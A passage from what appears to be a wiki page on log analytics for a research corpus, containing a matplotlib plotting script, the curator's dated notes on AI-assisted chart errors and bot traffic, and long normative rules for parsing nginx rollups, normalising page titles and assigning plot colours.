    max_by_title[t] = mx

    rows.append(pd.DataFrame({"title": t, "rel": rel, "h": disp_h, "m": disp_m}))

series = pd.concat(rows, ignore_index=True)

# ---------- Ordering + Y mapping (mathematical) ----------
# ascending publication datetime; earliest gets highest baseline Y, latest gets Y=0.
ordered = sorted(titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)

def y0_for_index(i):
    return float((N - 1) - i)

ypos = {t: y0_for_index(i) for i, t in enumerate(ordered)}  # latest -> 0, earliest -> N-1

def label(t):
    return f"{t} ({pub_dt[t].isoformat()}) (h:{int(tot_h.get(t,0))}, m:{int(tot_m.get(t,0))})"

# ---------- Plot (NO axis inversion) ----------
fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)))

for t in ordered:
    g = series[series["title"] == t].sort_values("rel")
    x = g["rel"].values.astype(float)
    y0 = ypos[t]
    mx = max_by_title.get(t, 0.0)
    scale = (ROW_MAX / mx) if mx and mx > 0 else 0.0

    # baseline
    ax.plot(x, np.full_like(x, y0), lw=0.25, color="black")
    # Blue UP: y0 -> y0 + h
    ax.fill_between(x, y0, y0 + (g["h"].values * scale), color="tab:blue", alpha=1.0)
    # Orange DOWN: y0 -> y0 - m
    ax.fill_between(x, y0, y0 - (g["m"].values * scale), color="tab:orange", alpha=1.0)

ax.axvline(0, ls="--", lw=0.8, color="black")

# Y ticks in the same numeric coordinate system
yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title("Access Lifecycle Graphlets (Y+ up / Y- down; earliest at highest Y, latest at Y=0)")

ax.legend(
    handles=[
        Patch(facecolor="tab:blue", label="human (MA7×10, up)"),
        Patch(facecolor="tab:orange", label="meta (MA7, down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

# keep margins stable for long labels
plt.subplots_adjust(left=0.40, right=0.98, top=0.95, bottom=0.06)

out = "/mnt/data/lifecycle_graphlets_MATH_Y.png"
plt.savefig(out, dpi=180)
plt.close()
print(out)

2026-02-05 access lifetime

Apologies for the model's mistakes with these projections - it had extreme trouble with the invariants, and it can take hours and many turns to get a projection right. This one has human and metadata access inverted.

2026-02-03 access lifetime

2026-02-03 accumulated page counts

The page category bar graph has been revised to project page access, metadata access, AI access and bot access, which provides interesting insight. There are bots masquerading as regular browsers that access the metadata pages and walk through the MediaWiki page versions.


After today's analysis I can see I need to reproject the others, now that I have separated semantic access between page and metadata. The metadata access has proven to be mostly machine driven, and pages of interest show higher machine hits. Machines have been tasked to watch this corpus, and the proof is in the projections above.

2026-02-02 accumulated human get

This morning the model has been quite unreliable, as you will see if you look at how the versions of the following projections progress. It doesn't matter how good the normative sections are; it still needs a lot of prompting to get things right. It got the order wrong in the scatter plot, and there is a page with zero counts because it cannot handle the titles properly and cannot do a simple match from the TSV file title names back to the verbatim manifest names. It also did not style the accumulated projection colours, so the line graph is ambiguous.

It turns out that there is a high percentage of metadata access that comes from machinery that is not identifying as a robot. The new rollups from 2026-02-03 now split that category out.

  • 2026-02-02 from 2025-12-15: page bar chart

  • 2026-02-02 from 2025-12-15: page access scatter plot

  • 2026-02-02 from 2025-12-15: cumulative human_get line plot

2026-02-01 accumulated human get

  • 2026-02-01 from 2025-12-15: total counts human_get

  • 2026-02-01 from 2025-12-15: page access scatter plot

  • 2026-02-01 from 2025-12-15: cumulative human_get line plot

2026-01-30 older projections

These were produced with slightly different invariants and proved problematic - so invariants were updated.

  • 2026-01-30 from 2025-12-25: accumulated human_get

  • 2026-01-30 from 2025-12-25: page access scatter plot


Appendix A - Corpus Projection Invariants (Normative)

GP-0 Projection Direction Up and Down semantics (MANDATORY, NORMATIVE)

Graph projections are made into mathematical spaces (e.g. paper, Cartesian coordinate systems):

  • the top of a 2D graph is in the increasing positive Y direction
    • to go up means to increase Y value; upwards is increasing Y
  • the bottom of a 2D graph is the decreasing Y direction
    • to go down means to decrease Y value; downwards is decreasing Y
  • the left of a 2D graph is in the decreasing X direction
    • to go left means to decrease X value; leftwards is decreasing X
  • the right of a 2D graph is in the increasing X direction
    • to go right means to increase X value; rightwards is increasing X

The human will think and relate via these conventions; do not mix these semantics with whatever the tooling does internally to produce the projection.

E.g.

  • human bell curves must be blue and point upwards i.e. the peaks have projected Y values above the baseline.
  • metadata bell curves must be orange and point downwards i.e. the peaks have projected Y value below the baseline.
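A minimal matplotlib sketch of these GP-0 semantics, using synthetic bell curves and a hypothetical output filename: human fills upward from the baseline in blue, metadata fills downward in orange, and the Y axis is never inverted.

```python
import numpy as np
import matplotlib
matplotlib.use("Agg")  # headless backend so the sketch is reproducible
import matplotlib.pyplot as plt

x = np.linspace(-10, 10, 201)
human = np.exp(-x**2 / 8)  # synthetic human bell curve (illustrative)
meta = np.exp(-x**2 / 8)   # synthetic metadata bell curve (illustrative)
baseline = 0.0

fig, ax = plt.subplots()
# GP-0: human points UP (projected Y above the baseline), in blue
ax.fill_between(x, baseline, baseline + human, color="tab:blue", alpha=1.0)
# GP-0: metadata points DOWN (projected Y below the baseline), in orange
ax.fill_between(x, baseline, baseline - meta, color="tab:orange", alpha=1.0)
# GP-0a: the toolchain must not invert the axis; Y increases upwards
ax.set_xlabel("X (rightwards = increasing)")
fig.savefig("gp0_demo.png", dpi=90)  # hypothetical output filename
plt.close(fig)
```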

GP-0a: Projection Direction Tooling Override Prohibition (MANDATORY, NORMATIVE)

The assisting system, plotting library, or UI layer MUST NOT override, reinterpret, or “helpfully adjust” any of the following governed properties:

  • Axis direction (NO y-axis inversion; NO automatic axis flipping)
  • Row ordering (publication datetime ascending only)
  • Scaling mode (must be exactly the declared mode; no auto-rescaling)
  • Tick placement or gridline intervals (must match declared steps)
  • Label content, ordering, or truncation (no elision, wrapping, or abbreviation unless explicitly specified)
  • Margins (must be computed to fit widest label; no extra whitespace added)
  • Opacity (alpha MUST remain 1.0)

If any component of the toolchain cannot honour these constraints exactly, the projection MUST FAIL EXPLICITLY rather than silently substituting alternative behaviour.

This prohibition applies equally to:

  • plotting backends
  • UI renderers
  • export pipelines
  • downstream “pretty-print” or “auto-layout” passes.

Authority and Governance

  • The projections are curator-governed and MUST be reproducible from declared inputs alone.
  • The assisting system MUST NOT infer, rename, paraphrase, merge, split, or reorder titles beyond the explicit rules stated here.
  • The assisting system MUST NOT optimise for visual clarity at the expense of semantic correctness.
  • Any deviation from these invariants MUST be explicitly declared by the human curator with a dated update entry.

Authoritative Inputs

  • Input A: Hourly rollup TSVs produced by logrollup tooling.
  • Input B: Corpus bundle manifest (corpus/manifest.tsv).
  • Input C: Full temporal range present in the rollup set (no truncation).
  • Input D: When supplied, page_list_verify aggregation verification counts (e.g. output.csv)

Rollups Processing Mode Invariants (Normative)

Scope

These invariants govern any downstream processing of the TSV rollups generated by logrollup (e.g., aggregation, graphing, rate calculations, moving averages, anomaly detection). They are independent of nginx log parsing and apply only to the rollups artefacts (.tsv) produced by the generator.

Inputs (Normative)

RP-1 — Rollups artefact set

Processing MUST operate only on TSV files produced by logrollup in accordance with its fixed output schema. Non-conforming TSV files MUST be rejected (or excluded) deterministically.

RP-2 — Time bucket identity is filename authoritative

The bucket time window MUST be derived from the TSV filename, not inferred from file mtime and not inferred from internal row data.

Filename format is normative:

  • YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv

The start timestamp is the left segment; the end timestamp is the right segment.

RP-3 — Bucket duration is purely mathematical

Bucket duration MUST be computed as:

  • bucket_seconds = epoch(end) - epoch(start)

Bucket duration MUST NOT be assumed to be constant across all files, and MUST NOT be hard-coded (even if the generator typically uses 01:00).
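RP-2 and RP-3 together can be sketched as follows (regex and function names are illustrative):

```python
import re
from datetime import datetime, timezone

BUCKET_RE = re.compile(
    r"^(\d{4}_\d{2}_\d{2}T\d{2}_\d{2}Z)-to-(\d{4}_\d{2}_\d{2}T\d{2}_\d{2}Z)\.tsv$"
)

def bucket_window(filename):
    """RP-2: the window comes from the filename alone; RP-1: reject
    non-conforming names deterministically."""
    match = BUCKET_RE.match(filename)
    if match is None:
        raise ValueError(f"non-conforming rollup filename: {filename!r}")
    parse = lambda s: datetime.strptime(s, "%Y_%m_%dT%H_%MZ").replace(tzinfo=timezone.utc)
    start, end = parse(match.group(1)), parse(match.group(2))
    # RP-3: duration is purely mathematical, never hard-coded
    return start, end, (end - start).total_seconds()

start, end, secs = bucket_window("2026_02_03T10_00Z-to-2026_02_03T11_00Z.tsv")
```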

RP-4 — Column schema is authoritative

The first TSV row (header) MUST be used to map column positions. Column order MUST NOT be assumed, except that all required column names MUST exist.

The following columns are normative and MUST exist:

  • total_bytes
  • total_hits
  • server_name
  • path

All agent/method/status counters MUST be treated as optional only if missing from the header; if present, they MUST be parsed as non-negative integers.

RP-5 — Units and rate conversions are fixed

Rates MUST be computed from total_bytes as follows:

  • bytes_per_second = total_bytes / bucket_seconds
  • MiB_per_second = bytes_per_second / (1024 * 1024)

If any other base (e.g., 1000*1000) is used, it MUST be explicitly declared as non-normative.
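A sketch of the normative conversions (function name illustrative; the byte value is an arbitrary example):

```python
def rates_from_bucket(total_bytes, bucket_seconds):
    """RP-5: fixed conversions from the authoritative total_bytes counter."""
    bytes_per_second = total_bytes / bucket_seconds
    mib_per_second = bytes_per_second / (1024 * 1024)  # binary base is normative
    return bytes_per_second, mib_per_second

# 50 MiB served over a one-hour bucket (arbitrary example values)
bps, mibs = rates_from_bucket(total_bytes=52_428_800, bucket_seconds=3600)
```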

RP-6 — Path keys are already canonical

The 'path' field MUST be treated as an already-canonical identity key emitted by the generator. Downstream processing MUST NOT re-normalise, rewrite, decode, or canonicalise 'path' (including but not limited to query stripping, title extraction, dash/underscore transforms, or slash collapsing). Any additional canonicalisation would constitute mutation of the generator’s identity projection and is prohibited.

RP-7 — Meta-access paths are first-class

Paths under:

  • /<root>-meta/<meta_class>/<title>

MUST be retained as distinct from:

  • /<root>/<title>

and from infrastructure paths (e.g., /<root>-dir/load.php). Meta paths MUST NOT be merged into page paths.

RP-8 — Host separation is first-class

All computations MUST treat 'server_name' as part of the aggregation key. Cross-host merging MUST NOT occur unless explicitly requested, and if it occurs, it MUST be performed as a deliberate secondary operation with an explicit declaration.

Aggregation Semantics (Normative)

RP-9 — Default aggregation key

Unless explicitly overridden, the aggregation key MUST be:

(bucket_start, server_name, path)
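A sketch of the default aggregation under RP-8/RP-9, with hypothetical hostnames and toy values:

```python
import pandas as pd

# Toy rollup rows; column names follow the normative schema (RP-4),
# hostnames are hypothetical.
rollups = pd.DataFrame({
    "bucket_start": ["2026-02-03T10:00Z"] * 3,
    "server_name": ["wiki.example", "wiki.example", "other.example"],
    "path": ["/pub/A", "/pub/A", "/pub/A"],
    "total_bytes": [100, 200, 400],
    "total_hits": [1, 2, 4],
})

# RP-9: default key (bucket_start, server_name, path); RP-8: hosts never merge.
agg = (rollups
       .groupby(["bucket_start", "server_name", "path"], as_index=False)
       [["total_bytes", "total_hits"]].sum())
```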

RP-10 — Collapsing across paths

If an analysis requires collapsing across paths (e.g., total throughput per host), the collapse MUST be performed by summing only total_bytes (and/or total_hits) over the chosen key-space. Collapsing MUST NOT recompute or “estimate” bytes from hit counts.

RP-11 — Derivable totals are not recomputed

If agent/method/status counters exist, they MAY be used for classification analytics, but total_bytes MUST remain authoritative for bandwidth calculations and MUST NOT be reconstructed from sub-counters.

Moving Average and Plotting (Normative)

RP-12 — MA(3) definition

If a MA(3) overlay is requested, it MUST be computed as a simple trailing moving average over the time-ordered buckets:

  • MA3[i] = (rate[i] + rate[i-1] + rate[i-2]) / 3

For i < 2, MA3 MUST be undefined (or omitted) rather than padded with fabricated values, unless explicitly instructed otherwise.
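A sketch of the RP-12 definition; the first two positions are left as NaN rather than padded with fabricated values:

```python
import numpy as np

def ma3(rates):
    """RP-12: simple trailing MA(3); MA3[i] undefined (NaN) for i < 2."""
    rates = np.asarray(rates, dtype=float)
    out = np.full_like(rates, np.nan)
    for i in range(2, len(rates)):
        out[i] = (rates[i] + rates[i - 1] + rates[i - 2]) / 3.0
    return out

m = ma3([3.0, 6.0, 9.0, 12.0])
```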

RP-13 — Time ordering

Buckets MUST be ordered by bucket_start epoch ascending. Filesystem ordering and lexical ordering are insufficient unless validated by parsing bucket_start from filename.

RP-14 — Missing buckets

If bucket windows are missing (gaps), MA(3) MUST NOT interpolate. It MUST operate on observed bucket series only, and any gaps SHOULD be represented explicitly in the plotted timeline if the plotting system supports it.

RP-15 — Logarithmic axis precondition

If a logarithmic Y-axis is used, zero values MUST be handled deterministically:

  • either omitted from log-scale plotting, or
  • mapped via a declared epsilon policy (non-normative unless explicitly stated).

Zero-handling MUST NOT fabricate non-zero traffic.

Integrity (Normative)

RP-16 — Non-negative integers

All parsed counters and total_bytes MUST be non-negative integers. Any negative or non-numeric value MUST trigger a deterministic rejection of that row (or file), as declared by the processing implementation.

RP-17 — Deterministic parse errors

All parse failures MUST be deterministic and reproducible: given the same input TSV set, the same rows/files MUST be rejected, and rejection reasons MUST be auditable (e.g., logged).

Path → Title Extraction

  • A rollup record contributes to a page only if a title can be extracted by these rules:
    • If path matches /pub/<title>, then <title> is the candidate.
    • If path matches /pub-dir/index.php?<query>, the title MUST be taken from title=<title>.
    • If title= is absent, page=<title> MAY be used.
    • Otherwise, the record MUST NOT be treated as a page hit.
  • URL fragments (#…) MUST be removed prior to extraction.

Title Normalisation

  • URL decoding MUST occur before all other steps.
  • Underscores (_) MUST be converted to spaces.
  • UTF-8 dashes (–, —) MUST be converted to ASCII hyphen (-).
  • Whitespace runs MUST be collapsed to a single space and trimmed.
  • After normalisation, the title MUST exactly match a manifest title to remain eligible.
  • Main Page SHALL be included in projections.
  • Category:Cognitive Memoisation SHALL be included in projections.
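The extraction and normalisation rules above can be sketched as follows (a sketch assuming the /pub and /pub-dir roots used elsewhere in this document; helper names are illustrative):

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

def normalise_title(t):
    t = unquote(t)                         # URL decoding MUST occur first
    t = t.replace("_", " ")                # underscores -> spaces
    t = re.sub(r"[\u2013\u2014]", "-", t)  # UTF-8 dashes -> ASCII hyphen
    return re.sub(r"\s+", " ", t).strip()  # collapse runs, trim

def extract_title(path):
    """Return a candidate page title, or None if the record is not a page hit."""
    path = path.split("#", 1)[0]           # fragments removed prior to extraction
    parts = urlsplit(path)
    if parts.path.startswith("/pub/") and len(parts.path) > len("/pub/"):
        return normalise_title(parts.path[len("/pub/"):])
    if parts.path == "/pub-dir/index.php":
        query = parse_qs(parts.query)
        for key in ("title", "page"):      # title= preferred; page= MAY be used
            if key in query:
                return normalise_title(query[key][0])
    return None
```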

Renamed page/title treatments

Ignore Pages

Ignore the following pages:

  • DOI-master .* (deleted)
  • Cognitive Memoisation library (old)

Normalisation Overview

A list of page renames / redirects and mappings that appear within the mediawiki web-farm nginx access logs and rollups.

mediawiki pages

  • all mediawiki URLs that contain an underscore (_) can be mapped to a page title by substituting a space ( ) for each underscore.
  • URLs may be URL encoded as well.
  • mediawiki rewrites page to /pub/<title>
  • mediawiki uses /pub-dir/index.php? parameters to refer to <title>
  • mediawiki: the normalised resource part of a URL path, or a parameter such as title=<title> or edit=<title>, means the normalised title refers to the same target page.

curator action

Some former pages had emdash etc.

  • dash rendering: emdash (–) (or similar UTF8) was replaced with dash (-) (ASCII)
renamed pages - under curation
Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaboration
Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaborationn
Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaboration
Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaborationn
Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_-_AI_Collaboration
Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_–_AI_Collaboration
Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge_Engineering_Pattern_for_Stateless_LLM_Interaction
Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge-Engineering_Pattern_for_Stateless_LLM_Interaction
Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation'
Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation
Cognitive_Memorsation:_Plain-Language_Summary_(For_Non-Technical_Readers)'
  • What Can Humans Trust LLM AI to Do? has been output in the rollups and verification output.tsv as 'What Can Humans Trust LLM AI to Do' without the ? due to invalid path processing in the Perl code
    • the title/publication is to be considered the same as the title without the question mark.

Wiki Farm Canonicalisation (Mandatory)

  • Each MediaWiki instance in a farm is identified by a (vhost, root) pair.
  • Each instance exposes paired URL forms:
    • /<x>/<Title>
    • /<x-dir>/index.php?title=<Title>
  • For the bound vhost:
    • /<x>/ and /<x-dir>/index.php MUST be treated as equivalent roots.
    • All page hits MUST be folded to a single canonical resource per title.
  • Canonical resource key:
    • (vhost, canonical_title)

Resource Extraction Order (Mandatory)

  1. URL-decode the request path.
  2. Extract title candidate:
    1. If path matches ^/<x>/<title>, extract <title>.
    2. If path matches ^/<x-dir>/index.php?<query>:
      1. Use title=<title> if present.
      2. Else MAY use page=<title> if present.
    3. Otherwise the record is NOT a page resource.
  3. Canonicalise title:
    1. "_" → space
    2. UTF-8 dashes (–, —) → "-"
    3. Collapse whitespace
    4. Trim leading/trailing space
  4. Apply namespace exclusions.
  5. Apply infrastructure exclusions.
  6. Apply canonical folding.
  7. Aggregate.

Infrastructure Exclusions (Mandatory)

Exclude:

  • /
  • /robots.txt
  • Any path containing "sitemap"
  • Any path containing /resources or /resources/
  • /<x-dir>/index.php
  • /<x-dir>/load.php
  • /<x-dir>/api.php
  • /<x-dir>/rest.php/v1/search/title

Exclude static resources by extension:

  • .png .jpg .jpeg .gif .svg .ico .webp

Order of normalisation (mandatory)

The correct algorithm (the fix, stated cleanly) is the only compliant order of operations under these invariants:

  • Load corpus manifest
  • Normalise manifest titles → build the canonical key set
  • Build rename map that maps aliases → manifest keys (not free-form strings)

When the verification output.tsv is available:

  • Process output.tsv:
    • normalise the raw resource
    • apply the rename map → it must resolve to a manifest key
    • if it does not resolve, it is out of domain

Aggregate strictly by manifest key, then project. Anything else is non-compliant.
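A sketch of the rename-map resolution step, seeded with an alias/canonical pair taken from the renamed-pages list above; the real key set and map are built from manifest.tsv:

```python
# Canonical key set and rename map, seeded here with titles from the
# renamed-pages list; the real inputs come from manifest.tsv.
CANON = ("Progress Without Memory: Cognitive Memoisation as a "
         "Knowledge Engineering Pattern for Stateless LLM Interaction")
ALIAS = ("Progress Without Memory: Cognitive Memoisation as a "
         "Knowledge-Engineering Pattern for Stateless LLM Interaction")

manifest_keys = {CANON}
rename_map = {ALIAS: CANON}  # alias (already normalised) -> manifest key

def resolve(normalised_title):
    """Apply the rename map; anything that fails to reach a manifest key
    is out of domain and must not be aggregated."""
    candidate = rename_map.get(normalised_title, normalised_title)
    return candidate if candidate in manifest_keys else None
```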

Accumulated human_get time series (projection)

Eligible Resource Set (Corpus Titles)

  • The eligible title set MUST be derived exclusively from corpus/manifest.tsv.
  • Column 1 of manifest.tsv is the authoritative MediaWiki page title.
  • Only titles present in the manifest (after normalisation) are eligible for projection.
  • Titles present in the manifest MUST be included in the projection domain even if they receive zero hits in the period.
  • Titles not present in the manifest MUST be excluded even if traffic exists.

Noise and Infrastructure Exclusions

  • The following MUST be excluded prior to aggregation:
    • Special:, Category:, Category talk:, Talk:, User:, User talk:, File:, Template:, Help:, MediaWiki:
    • /resources/, /pub-dir/load.php, /pub-dir/api.php, /pub-dir/rest.php
    • /robots.txt, /favicon.ico
    • sitemap (any case)
    • Static resources by extension (.png, .jpg, .jpeg, .gif, .svg, .ico, .webp)

Temporal Aggregation

  • Hourly buckets MUST be aggregated into daily totals per title.
  • Accumulated value per title is defined as:
    • cum_hits(title, day_n) = Σ daily_hits(title, day_0 … day_n)
  • Accumulation MUST be monotonic and non-decreasing.
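The accumulation rule can be illustrated with a minimal non-normative sketch (accumulate_daily is a hypothetical helper name):

```python
from collections import defaultdict
from itertools import accumulate

def accumulate_daily(hourly_rows, days):
    """hourly_rows: (title, day, hits) tuples; days: day_0..day_n in order."""
    daily = defaultdict(lambda: defaultdict(int))
    for title, day, hits in hourly_rows:
        daily[title][day] += hits                      # hourly buckets -> daily totals
    # cum_hits(title, day_n) = sum of daily_hits(title, day_0..day_n);
    # non-negative daily totals make the series monotonic non-decreasing.
    return {t: list(accumulate(daily[t][d] for d in days)) for t in daily}
```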

Axis and Scale Invariants

  • X axis: calendar date from earliest to latest available day.
  • Major ticks every 7 days.
  • Minor ticks every day.
  • Date labels MUST be rotated (oblique) for readability.
  • Y axis MUST be logarithmic.
  • Zero or negative values MUST NOT be plotted on the log axis.
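A non-normative Matplotlib sketch of these axis invariants; the series data is illustrative and the legend placement follows the Rendering Constraints below:

```python
import matplotlib
matplotlib.use("Agg")                                  # headless rendering
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt

days = [dt.date(2026, 2, 1) + dt.timedelta(d) for d in range(28)]
cum = [2 ** (d / 4) for d in range(28)]                # positive, monotonic example

fig, ax = plt.subplots()
ax.plot(days, cum, label="Example Title")
ax.set_yscale("log")                                        # Y axis logarithmic
ax.xaxis.set_major_locator(mdates.DayLocator(interval=7))   # major ticks every 7 days
ax.xaxis.set_minor_locator(mdates.DayLocator())             # minor ticks every day
ax.tick_params(axis="x", rotation=45)                       # oblique date labels
ax.legend(loc="center left", bbox_to_anchor=(1.0, 0.5))     # legend outside, right
fig.tight_layout()
```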

Legend Ordering

  • Legend entries MUST be ordered by descending final accumulated human_get_ok.
  • Ordering MUST be deterministic and reproducible.

Visual Disambiguation Invariants

  • Each title MUST be visually distinguishable.
  • The same colour MAY be reused.
  • The same line style MAY be reused.
  • The same (colour + line style) pair MUST NOT be reused.
  • Markers MAY be omitted or reused but MUST NOT be relied upon as the sole distinguishing feature.

Rendering Constraints

  • Legend MUST be placed outside the plot area on the right.
  • Sufficient vertical and horizontal space MUST be reserved to avoid label overlap.
  • Line width SHOULD be consistent across series to avoid implied importance.

Interpretive Constraint

  • This projection indicates reader entry and navigation behaviour only.
  • High lead-in ranking MUST NOT be interpreted as quality, authority, or endorsement.
  • Ordering reflects accumulated human access, not epistemic priority.

Periodic Regeneration

  • This projection is intended to be regenerated periodically.
  • Cross-run comparisons MUST preserve all invariants to allow valid temporal comparison.
  • Changes in lead-in dominance (e.g. Plain-Language Summary vs. CM-1 foundation paper) are observational signals only and do not alter corpus structure.

Metric Definition

  • The only signal used is human_get_ok.
  • non-human classifications MUST NOT be included.
  • No inference from other status codes or agents is permitted.

Corpus Lead-In Projection: Deterministic Colour Map

This table provides the visual encoding for the core corpus pages. For titles not included in the colour map, use colours at your discretion until a Colour Map entry exists.

Colours are drawn from the Matplotlib tab20 palette.

Line styles are assigned to ensure that no (colour + line-style) pair is reused. Legend ordering is governed separately by accumulated human GET_ok.

Corpus Page Title Colour Index Colour (hex) Line Style
Authority Inversion: A Structural Failure in Human-AI Systems 0 #1f77b4 -
Axes of Authority in Stateless Cognitive Systems: Authority Is Not Intelligence 1 #aec7e8 -
CM Capability survey invariants 2 #ff7f0e -
CM-master-1.16 (anchored) 3 #ffbb78 -
Case Study - When the Human Has to Argue With the Machine 4 #2ca02c -
ChatGPT UI Boundary Friction as a Constraint on Round-Trip Knowledge Engineering 5 #98df8a -
Cognitive Memoisation (CM) Public Statement and Stewardship Model 6 #d62728 -
Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration 7 #ff9896 -
Cognitive Memoisation Corpus Map 8 #9467bd -
Cognitive Memoisation Is Not Skynet 9 #c5b0d5 -
Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation 10 #8c564b -
Cognitive Memoisation: LLM Systems Requirements for Knowledge Round Trip Engineering 11 #c49c94 -
Cognitive Memoisation: Plain-Language Summary (For Non-Technical Readers) 12 #e377c2 -
Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration 13 #f7b6d2 -
Dangling Cognates: Preserving Unresolved Knowledge in Cognitive Memoisation 14 #7f7f7f -
Delegation of Authority to AI Systems: Evidence and Risks 15 #c7c7c7 -
Dimensions of Platform Error: Epistemic Retention Failure in Conversational AI Systems 16 #bcbd22 -
Durability Without Authority: The Missing Governance Layer in Human-AI Collaboration 17 #dbdb8d -
Episodic Failure Case Study: Tied-in-a-Knot Chess Game 18 #17becf -
Externalised Meaning: Making Knowledge Portable Without Ontologies, Vendors or Memory 19 #9edae5 -
First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2) 0 #1f77b4 --
From UI Failure to Logical Entrapment: A Case Study in Post-Hoc Cognitive Memoisation After Exploratory Session Breakdown 1 #aec7e8 --
Governance Failure Axes Taxonomy 2 #ff7f0e --
Governing the Tool That Governs You: A CM-1 Case Study of Authority Inversion in Human-AI Systems 3 #ffbb78 --
Identified Governance Failure Axes: for LLM platforms 4 #2ca02c --
Integrity and Semantic Drift in Large Language Model Systems 5 #98df8a --
Journey: Human-Led Convergence in the Articulation of Cognitive Memoisation 6 #d62728 --
Looping the Loop with No End in Sight: Circular Reasoning Under Stateless Inference Without Governance 7 #ff9896 --
Market Survey: Portability of CM Semantics Across LLM Platforms 8 #9467bd --
Nothing Is Lost: How to Work with AI Without Losing Your Mind 9 #c5b0d5 --
Observed Model Stability: Evidence for Drift-Immune Embedded Governance 10 #8c564b --
Post-Hoc CM Recovery Collapse Under UI Boundary Friction: A Negative Result Case Study 11 #c49c94 --
Progress Without Memory: Cognitive Memoisation as a Knowledge-Engineering Pattern for Stateless LLM Interaction 12 #e377c2 --
Reflexive Development of Cognitive Memoisation: A Round-Trip Cognitive Engineering Case Study 13 #f7b6d2 --
Reflexive Development of Cognitive Memoisation: Dangling Cognates as a First-Class Cognitive Construct 14 #7f7f7f --
What Can Humans Trust LLM AI to Do? 15 #c7c7c7 --
When Evidence Is Not Enough: An Empirical Study of Authority Inversion and Integrity Failure in Conversational AI 16 #bcbd22 --
When Training Overrides Logic: Why Declared Invariants Were Not Enough 17 #dbdb8d --
Why Cognitive Memoisation Is Not Memorization 18 #17becf --
Why Machines Cannot Own Knowledge 19 #9edae5 --
XDUMP as a Minimal Recovery Mechanism for Round-Trip Knowledge Engineering Under Governance Situated Inference Loss 0 #1f77b4 -.

Corpus Lead-In Projection: Colour-Map Hardening Invariants

This section hardens the visual determinism of the Corpus Lead-In Projection while allowing controlled corpus growth.

Authority

  • This Colour Map is authoritative for all listed corpus pages.
  • The assisting system MUST NOT invent, alter, or substitute colours or line styles for listed pages.
  • Visual encoding is a governed property, not a presentation choice.

Page Labels

  • Page labels MUST be normalised and then mapped to human-readable titles.
  • Titles MUST NOT be duplicated.
  • Some titles are mapped due to rename:
    • Do not show the prior name; always show the later name in the projection, e.g. Corpus guide -> Corpus Map.

Binding Rule

  • For any page listed in the Deterministic Colour Map table:
    • The assigned (colour index, colour hex, line style) pair MUST be used exactly.
    • Deviation constitutes a projection violation.

Legend Ordering Separation

  • Colour assignment and legend ordering are orthogonal.
  • Legend ordering MUST continue to follow the accumulated human GET_ok invariant.
  • Colour assignment MUST NOT be influenced by hit counts, rank, or ordering.

New Page Admission Rule

  • Pages not present in the current Colour Map MUST still appear in projections.
  • New pages MUST be assigned styles in strict sequence order:
    • Iterate line style first, then colour index, exactly as defined in the base palette.
    • Previously assigned pairs MUST NOT be reused.
  • The assisting system MUST NOT reshuffle existing assignments to “make space”.
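A non-normative sketch of the admission sequence. The colour index advances within each line style, matching the base Colour Map table; admit_new_pages is a hypothetical helper, and the explicit failure on palette exhaustion follows the Failure Mode Detection rule below:

```python
def admit_new_pages(used_pairs, new_titles, n_colours=20,
                    line_styles=("-", "--", "-.", ":")):
    """Assign unused (colour_index, line_style) pairs in strict sequence order."""
    seq = [(c, s) for s in line_styles for c in range(n_colours)]
    free = (p for p in seq if p not in set(used_pairs))   # never reuse a pair
    out = {}
    for title in new_titles:              # provisional until curator ratification
        try:
            out[title] = next(free)
        except StopIteration:             # palette exhausted: fail explicitly
            raise RuntimeError("palette exhausted; silent reuse prohibited")
    return out
```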

Provisional Encoding Rule

  • Visual assignments for newly admitted pages are **provisional** until recorded.
  • A projection that introduces provisional encodings MUST:
    • Emit a warning note in the run metadata, and
    • Produce an updated Colour Map table for curator review.

Curator Ratification

  • Only the human curator may ratify new colour assignments.
  • Ratification occurs by appending new rows to the Colour Map table with a date stamp.
  • Once ratified, assignments become binding for all future projections.

Backward Compatibility

  • Previously generated projections remain valid historical artefacts.
  • Introduction of new pages MUST NOT retroactively alter the appearance of older projections.

Failure Mode Detection

  • If a projection requires more unique (colour, line-style) pairs than the declared palette provides:
    • The assisting system MUST fail explicitly.
    • Silent reuse, substitution, or visual approximation is prohibited.

Rationale (Non-Normative)

  • This hardening ensures:
    • Cross-run visual comparability
    • Human recognition of lead-in stability
    • Detectable drift when corpus structure changes
  • Visual determinism is treated as part of epistemic governance, not aesthetics.

daily hits scatter (projections)

purpose:

  • Produce deterministic, human-meaningful MediaWiki page-level analytics from nginx bucket TSVs,
  • folding all URL variants to canonical resources and rendering a scatter projection across agents, HTTP methods, and outcomes.

Authority

  • These invariants are normative.
  • The assisting system MUST follow them exactly.
  • Visual encoding is a governed semantic property, not a presentation choice.

Inputs

  • Bucket TSVs produced by page_hits_bucketfarm_methods.pl
  • Required columns:
    • server_name
    • path (or page_category)
    • <agent>_<METHOD>_<outcome> numeric bins
  • Other columns MAY exist and MUST be ignored unless explicitly referenced.

Scope

